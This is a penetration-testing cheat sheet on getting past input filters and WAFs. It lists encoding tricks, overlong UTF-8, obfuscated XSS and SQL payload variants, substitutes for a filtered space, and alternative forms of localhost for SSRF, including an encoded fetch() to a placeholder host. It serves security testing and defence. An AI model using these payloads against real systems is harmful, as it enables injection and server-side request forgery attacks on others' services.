Appearance
Bypass
📚 Resources
🧰 Tools
Encoding
| Technique | Example | Purpose |
|---|---|---|
| Simple URL encoding | %3Cscript%3E | Escape special characters |
| Double encoding | %253Cscript%253E | Bypass single-layer decoders |
| HTML entities | <script> | Prevent HTML rendering |
| Unicode encoding | \u003Cscript\u003E | Bypass Unicode parsers |
| Hex encoding (JS) | \x3Cscript\x3E | Obfuscate in JS context |
| Base64 encoding | ZmV0Y2goJy8veHh4eCcp | Hide complete payload |
| Mixed encoding | Mix of %, <, \u... | Evade regex-based filters |
| Whitespace obfuscation | <scr ipt>alert(1)</scr ipt> | Break detection logic |
| Comment injection | <script><!--alert(1);//--></script> | Split malicious code |
Filter Space
If %20 is filtered:
bash
%09 # tab
%0B # VT (Vertical Tab)
%0C # FF (Form Feed)
%0D # CR
%0A # LF
%00 # Null byteMixed Encoding
Sometimes mixing different encodings bypasses filters.
- Hex + Unicode:
%u003Cscript%u003E - UTF-8 overlong:
%C0%AF(2 bytes) or%E0%80%AF(3 bytes) =/ - Case mixing:
%3cSCRIPT%3e
Overlong UTF-8
Represents ASCII characters using more bytes than necessary. Sometimes bypasses WAFs.
| Char | UTF-8 Normal | 2 Bytes | 3 Bytes |
|---|---|---|---|
/ | %2F | %C0%AF | %E0%80%AF |
. | %2E | %C0%AE | %E0%80%AE |
\0 | %00 | %C0%80 | %E0%80%80 |
WAF Bypass
| Technique | Example | Purpose |
|---|---|---|
| Case Toggling | <sCrIpT>alert()</sCRiPt> | Change casing to bypass filters |
| Using Comments | <!--><script>alert/**/()/**/</script> | Inject comments to disrupt parsing |
| Inline Comments | /*!SELECT*/ | Break keyword detection |
| HTTP Parameter Pollution | ?id=1&id=2 | Confuse parameter parsers |
| Keyword Splitting | SEL<ECT> | Split keywords |
| Character Reference Encoding | <a href=javascript:alert(1)> | Use ASCII/hex refs |
| Junk Characters | <script>+-+-1-+-+alert(1)</script> | Add noise to mask intent |
IP Bypass
hacktricks - url format bypass
bash
http://127.0.1
http://127.1
# Decimal
http://2130706433
# Hexidecimal
http://0x7f000001
# Dotted Hexidecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001
# Others
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0x0.000000000.0x1
http://①②⑦.⓪.⓪.①
# IPV6
[::1] | [::]